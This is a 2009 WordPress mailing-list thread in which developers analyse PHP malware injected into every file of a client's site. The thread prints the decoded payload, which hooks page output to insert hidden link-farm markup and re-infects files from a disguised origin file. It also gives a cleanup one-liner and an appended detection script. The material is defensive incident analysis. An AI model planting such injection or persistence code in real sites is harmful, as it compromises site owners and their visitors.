[wp-hackers] Weird PHP Injection

Chris Jean gaarai at gaarai.com
Thu Oct 29 20:01:50 UTC 2009


I've seen this a lot lately. It's actually not just limited to WordPress
since I've seen it in PHP-based forum software as well. While the code
may not be exactly the same, it is similar enough to tell me that it is
either the same family of code or a derivative.

In the forum case, a bug was exploited that allowed the attacker to
load PHP code through an uploaded image that didn't filter against PHP
files being uploaded. This initial PHP code goes through all the PHP
files it can find on the site and adds code similar to what you have
below to them.

As seen in your partial decode, the code in each of the files calls the
origin code each time to ensure that all new or cleaned up PHP files are
remodified, thus making it hard to remove unless you find that origin
file and remove it first.

I've yet to determine exactly how WordPress sites pick this up, but I
wouldn't be surprised if it isn't through a similar process of being
able to upload a PHP file to the server through a bugged piece of code.
It is possible that a different method is used and that it is through
compromised FTP, SSH, etc credentials or through shared hosting with
poor security that doesn't prevent the spread of files between different
hosting accounts.

Every time I've seen code like this, it does nothing more than inject a
hidden link farm into the content of the site. So, it's destructive to
the search engine rankings of the exploited site, but I have yet to see
it attempt to be anything more dangerous than that.

Chris Jean
http://gaarai.com/
@chrisjean



Lew Ayotte - Full Throttle Development wrote:
> I'm not sure if anyone has seen this before... except for this guy:
> http://wordpress.org/support/topic/320918?replies=8
>
> But I just ran into an issue with a client using WP2.8.4. It seems like
> every single file in WP (including themes and plugins) had this injected at
> the top:
>
> <?
> /**/eval(base64_decode('[long base64 blob removed]'));
> ?>
>
>
> Which I decoded and prettied up for everyone:
>
> if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
>     $GLOBALS['sh_no'] = 1; // run-once guard so nested includes don't re-register the buffer
>     if(file_exists('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php')) {
>         // Pull in the "origin" file; it is expected to define gml(), which returns the injected markup
>         include_once('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php');
>         if(function_exists('gml')&&!function_exists('dgobh')) {
>             if(!function_exists('gzdecode')) {
>                 // Fallback gzdecode() for old PHP: read the gzip FLG byte, skip the optional
>                 // header fields it announces, then inflate the remaining deflate stream
>                 function gzdecode($R20FD65E9C7406034FADC682F06732868) {
>                     $R6B6E98CDE8B33087A33E4D3A497BD86B = ord(substr($R20FD65E9C7406034FADC682F06732868,3,1)); // FLG
>                     $R60169CD1C47B7A7A85AB44F884635E41 = 10; // offset just past the fixed 10-byte header
>                     $R0D54236DA20594EC13FC81B209733931 = 0;
>                     if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) { // FEXTRA: 2-byte length + extra field
>                         $R0D54236DA20594EC13FC81B209733931 = unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
>                         $R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
>                         $R60169CD1C47B7A7A85AB44F884635E41 += 2+$R0D54236DA20594EC13FC81B209733931;
>                     }
>                     if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) { // FNAME: zero-terminated file name
>                         $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
>                     }
>                     if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) { // FCOMMENT: zero-terminated comment
>                         $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
>                     }
>                     if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) { // FHCRC: 2-byte header CRC
>                         $R60169CD1C47B7A7A85AB44F884635E41 += 2;
>                     }
>                     $RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
>                     if($RC4A5B5E310ED4C323E04D72AFAE39F53 === FALSE) {
>                         // Not gzip after all: hand back the input unchanged
>                         $RC4A5B5E310ED4C323E04D72AFAE39F53 = $R20FD65E9C7406034FADC682F06732868;
>                     }
>                     return $RC4A5B5E310ED4C323E04D72AFAE39F53;
>                 }
>             }
>             // Output-buffer callback: force the response uncompressed, then splice gml()
>             // right after the opening <body ...> tag (or prepend it if there is no body tag)
>             function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
>                 Header('Content-Encoding: none');
>                 $R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
>                 if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
>                     return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
>                 } else {
>                     return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
>                 }
>             }
>             // Every page rendered from here on passes through dgobh() before it is sent
>             ob_start('dgobh');
>         }
>     }
> }
>
> I have no idea what it does and I'm not sure if the WP-phpMyAdmin plugin had
> a security hole or why it's part of this code. But I deactivated it on the
> client's site.
>
> To clean it up:
> I first tried just upgrading him to WP2.8.5, but as soon as I visited the
> site, it re-injected all the files with that crap. So I ran this script to
> remove it from all files:
>
> find . -name '*.php' | xargs perl -pi -e "s#\<\?
> /\*\*/eval\(base64_decode\('.+'\)\); \?\>##g"
>
> Then, for good measure I re-copied all the WP2.8.5 files back over. It seems
> to have fixed it for the client.
>
> Also, for what it's worth, these are all the plugins that he had
> activated...
>
>     AddThis Social Bookmarking Widget
>     Advanced Excerpt
>     Akismet
>     Dagon Design Form Mailer
>     Event Calendar
>     Lightbox 2
>     NextGEN Gallery
>     Search & Replace
>     SEO Title Tag
>     Similarity
>     SimplePie Core
>     SimplePie Plugin for WordPress
>     Theme Switcher
>     Twitter Tools
>     Viper's Video Quicktags
>     WP-phpMyAdmin
>     wp-Table
>     WP-Table Reloaded
>     WPtouch iPhone Theme
>
> I'm still digging to see if I can figure out where the actual hole was. Any
> ideas?
>
> Lew Ayotte
> Full Throttle Development, LLC
> 706.363.0688
> 478.246.4627
> lew at fullthrottledevelopment.com
> http://fullthrottledevelopment.com
> http://twitter.com/full_throttle
> http://twitter.com/lewayotte
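The two points the thread makes, that every infected file carries the same `<? /**/eval(base64_decode('...')); ?>` prologue and that the decoded stage reaches back to one origin file via `include_once`, which must be removed first or the cleanup is undone, can be turned into a small scan. This is an added example, not code from either poster; the sample tree and stage text are constructed, and the regex matches only the exact prologue shape shown above.

```python
import base64, os, re, tempfile
# Prologue the thread shows at the top of every file:
#   <?  /**/eval(base64_decode('...'));  ?>
INJECT_RE = re.compile(
    r"<\?\s*/\*\*/eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>")
# The decoded stage reaches back to a single "origin" file via include_once(...)
ORIGIN_RE = re.compile(r"include_once\('([^']+)'\)")

def find_injection(src):
    """Return (payload_b64, decoded_text) if src carries the prologue, else None."""
    m = INJECT_RE.search(src)
    if not m:
        return None
    return m.group(1), base64.b64decode(m.group(1)).decode("utf-8", "replace")

def strip_injection(src):
    """Remove only the prologue; the file's own code is left untouched."""
    return INJECT_RE.sub("", src, count=1).lstrip("\n")

def scan_tree(root):
    """Infected .php files plus the origin path(s) their payload includes; remove the origin first."""
    infected, origins = [], set()
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hit = find_injection(fh.read())
            if hit:
                infected.append(os.path.relpath(path, root))
                origins.update(ORIGIN_RE.findall(hit[1]))
    return sorted(infected), sorted(origins)

# Constructed sample: the stage text is made up here and only mimics the decoded code's shape
SAMPLE_ORIGIN = ("/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin"
                 "/pmd/styles/default/images/style.css.php")
SAMPLE_STAGE = "if(file_exists('%s')){include_once('%s');}" % (SAMPLE_ORIGIN, SAMPLE_ORIGIN)
SAMPLE_PROLOGUE = "<?\n/**/eval(base64_decode('%s')); ?>\n" % (
    base64.b64encode(SAMPLE_STAGE.encode()).decode())

def build_sample_tree():
    root = tempfile.mkdtemp()  # one infected file at the top, one clean file in a subdir
    os.mkdir(os.path.join(root, "wp-content"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(SAMPLE_PROLOGUE + "<?php\nrequire('./wp-blog-header.php');\n")
    with open(os.path.join(root, "wp-content", "clean.php"), "w") as fh:
        fh.write("<?php\necho 'clean';\n")
    return root
```

Run `scan_tree()` over the web root before stripping anything, delete the reported origin path, then strip; doing it in the other order reproduces the re-infection Lew saw after upgrading.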


